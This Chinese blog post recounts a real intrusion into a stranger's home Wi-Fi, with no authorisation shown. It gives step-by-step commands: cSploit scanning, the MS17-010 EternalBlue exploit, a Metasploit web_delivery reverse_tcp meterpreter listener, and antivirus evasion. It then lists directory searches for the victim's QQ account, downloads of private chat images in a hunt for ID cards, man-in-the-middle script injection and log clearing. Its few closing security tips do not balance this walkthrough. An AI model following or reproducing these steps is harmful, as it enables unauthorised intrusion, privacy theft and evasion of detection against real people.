首页
学习
活动
专区
圈层
工具
发布
37 篇文章
1
7块钱的BadUSB,怎么玩
2
插一个U盘黑一台电脑-Badusb最详细制作教程
3
十块钱RMB | 用Digispark制作一个简单的Badusb
5
打造属于自己的渗透神器 第二篇
6
社工模拟——利用BadUSB穿透3层内网
7
穿透内网防线,USB自动渗透手法总结
8
【内网渗透】神器Mimikatz的入门简单实践
9
实战渗透 | 情侣空间钓鱼邀请,撸它
10
渗透实战之QQ空间钓鱼网站
11
【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]
12
QQFishing QQ钓鱼站点搭建
13
看我如何定位骗子,找出幕后诈骗的黑手(上)
14
我用Python渗透了一个钓鱼网站的所有信息
15
简单的制作一个钓鱼网页游戏_简单网页制作代码
16
攻破黑市之拿下吃鸡DNF等游戏钓鱼站群
17
CobaltStrike专题 | CobaltStrike实现批量发送钓鱼邮件
18
关于钓鱼网站的原理以及防范方法
19
社会工程学之基础概念、IP获取、IP物理定位、文件属性社会工程学之基础概念、IP获取、IP物理定位、文件属性
20
关于ReelPhish神器的使用
21
七、Selenium与phantomJS----------动态页面模拟点击、网站模拟登录 每天一个小实例1(动态页面模拟点击,并爬取你想搜索的职位信息) 每天一个小实例2(模拟网站登录)我用的是
22
社会工程学 | cobalstrike批量发送钓鱼邮件方法
23
我用Python采集了所有微信好友的头像,发现了一个秘密
24
插入U盘自动攻击:BadUSB原理与实现(含视频)
25
珍惜数据,远离钓鱼
26
钓鱼网站相关数据
27
记一次识别钓鱼网站,所有的盗号都是不经意间
28
如何利用手机木马远程控制
29
如何使用Kali生成木马入侵安卓手机
30
黑客入侵你手机的方法不止两种哦
31
一个黑客的自白书
33
Kali之安卓木马
34
Kali利用Android木马渗透手机(高级篇)
35
记一次无线渗透
36
记一次渗透测试实战
37
你安全吗?丨点击“不明链接”后果是什么你知道吗?
清单首页技术文章详情

记一次无线渗透

用到的工具

一台root的安卓手机(我这台手机刷了miui9)

Csploit 安卓渗透神器

下载地址:https://github.com/cSploit/android/releases

Kali meterpreter

当然你有Kali的Nethunter设备更好

开始测试

利用万能钥匙找一波wifi,运气好找到一个

连接wifi 用小米系统自带的WiFi分享功能,生成分享二维码。

然后可以截图保存,用任何带有扫一扫功能的手机扫描二维码,就能得到wifi密码。

有了WiFi密码,我们就可以试一下路由器的后台,一般家用路由器,都会把wifi密码和后台密码设置成一样的,这次运气也不错,直接进入后台

进入后台之后找了一下宽带账号,结果发现这只是一台拓展路由器,主路由器是192.168.1.1

浏览器直接访问192.168.1.1 ,发现来联通宽带登陆后台,试了一波弱口令,不能登陆,看来需要找到手机号码。

Wifi密码的作用到此就结束了,上安卓渗透神奇csploit

Csploit 内网渗透

手机安装好csploit,运行获得root权限,csploit会自动自动更新和下载msf核心(访问外国网站更新速度会更快,注意:开代理后软件不能做网络扫描),正常运行界面如下图。

Csploit不能识别国内的网络设备的名称,这里我们下载另一个网络工具Fing配合着使用,用Fing扫描出来的设备都有对应的名称,这样就比较方便筛选攻击对象。

Csploit 攻击教程网上有很多,请自行百度

给大家一个演示视频:https://www.youtube.com/user/jaofnee(需要访问外国网站)

通过csploit 和 Fing的扫描结果对比除开自己的电脑,内网中还有一台lenovoPC

在csploit扫描页面,点击192.168.0.110目标,进入模块利用界面。

安图中1 2 3 4步进行操作,作用是扫描端口漏洞并利用。

1、端口扫描工具扫描开放端口

2、然后运行服务检测工具

3、使用攻击方案查找工具,匹配完攻击脚本后,点击右上角选项全部运行。

4、我这里全部运行之后没有脚本利用成功,如果能运行成功的话,返回上一级页面,点击会话,就能获得一个shell。

之后又进行了一波中间人攻击,但从后台流量情况来看发现这家伙一直在看电视(M321是一台华为盒子),很少玩电脑,中间人攻击对苹果手机无效(之前用同事的手机测试过,苹果手机会直接断网),这样一来截取到的数据包非常少,没有可以利用的信息。

渗透工具测试

移动工具渗透无果,现在只能上PC工具了。这个内网有两个网段192.168.0.0/24和192.168.1.0/24,利用ms17-010扫描工具试一波~,运气比较好发现刚刚那台联想PC存在该漏洞

利用之前搭好的win2003 NAS工具包和kali进行漏洞利用,永恒之蓝工具能利用成功,说明漏洞确实存在。

但是运用Doublepulsar,导入dll执行文件失败,原因未知。。。

最后转战kali

meterpreter好像已经有了ms17-010的exploit脚本,对meterpreter直接升级,利用ms17_010_eternalblue 直接获得webshell

在目录中发现了360,可以猜测之前NAS工具没有利用成功应该是360起了一定的防护作用,同时也说明了meterpreter有一定程度上的免杀作用。

shell获取到了但是不能利用meterpreter模块,可能是360的缘故shell连接也不稳定,执行一两个命令就没有回显了。于是到网上找到了一篇免杀文章“Metasploit后门免杀模块之绕过某安全防护”文章链接https://bbs.ichunqiu.com/thread-20934-1-1.html 里面有视频教程。

免杀思路:

可能是因为性能原因,同一台kali上开两个msf实验时msf运行非常慢 最后也不能成功,于是用了两台kali。

第一步、kali-1上利用msf生成免杀powershell代码,同时开启监听

代码语言:javascript
代码运行次数:0
复制
msfconsle

use exploit/multi/script/web_delivery

set target 2

set payload windows/meterpreter/reverse_tcp

set LHOST [本地ip]

set URIPATH /

exploit /

第二步、kali-2上利用msf中的ms17-010获取靶机一个不稳定的shell,并执行免杀powershell命令(msf的百年套路就不写了)。

执行完后kali-1上就获得了稳定的meterpreter链接:

获得了meterpreter,可以提升到system权限但是不能截屏。继续工作,创建账号开通3389,但是远程链接任不能用,查看3389端口确实开了呀~~~心塞(应该是防火墙拦截了)。

只能另辟蹊径。回想一下之前的目的是要找到宽带手机号码和密码,现在已经获得了system shell权限但是不能远程控制,那就只能翻翻敏感目录了,目标瞄向QQ、wechat和用户桌面文件。

用meterpreter链接一个shell

查看盘符

Diskpart

LIST VOLUME

查看qq号码和目录:

代码语言:javascript
代码运行次数:0
复制
dir /s /a c:\ | find “Tencent\Users\”

获得qq号~

一个男的,名字刚好和wifi名称匹配,哎~不想和男的聊~算了不加他。。。

社攻一下,没有发现密码泄露....可能是社工库太菜了....

查看wechat号和目录:dir /s /a c:\ | find “\wechatdata\WeChat Files”,没有结果。此人居然没有用电脑微信。。。

找到了qq的目录,我们可以翻一下他的聊天图片,看会不会有身份证之类的敏感图片

qq的大部分的图片存放在下面3个目录中

代码语言:javascript
代码运行次数:0
复制
..\..\Tencent Files\[qq号]\Image\C2C #一对一聊天图片目录

..\..\Tencent Files\[qq号]\Image\Group #群聊图片目录

..\..\Tencent Files\[qq号]\Video #视频图片目录

利用merterpreter下载这些文件,要注意在merterpreter中切换目录好像只能一级一级切换,在切换带有空格名称的目录时要用””符号。

翻了一波图片,结果只发现一张貌似远程桌面的图片

既然用过远程那我们看一下远程记录缓存文件,可惜是空的...远程IP也ping不通

然后看一下Desktop,这绝对是一台公司的电脑,貌似是一个链家的经理

最后做个脚本提示该用户改wifi的密码吧

通过csploit中间人攻击利用脚本注入模块,下面是本地效果演示:

最后每当用户浏览http网站时浏览器便会自动弹出以下提示(对https的网站无效)。

渗透到此就结束吧。清除日志。

总结:

1、自己家的wifi千万不要用万能钥匙共享。

2、记得打好补丁,特别是445的,内网中Windows最好撸进去的就是445了

3、定期检查自己的电脑是不是中远控了

作者: arno

如有侵权,请联系删除

下一篇
举报
领券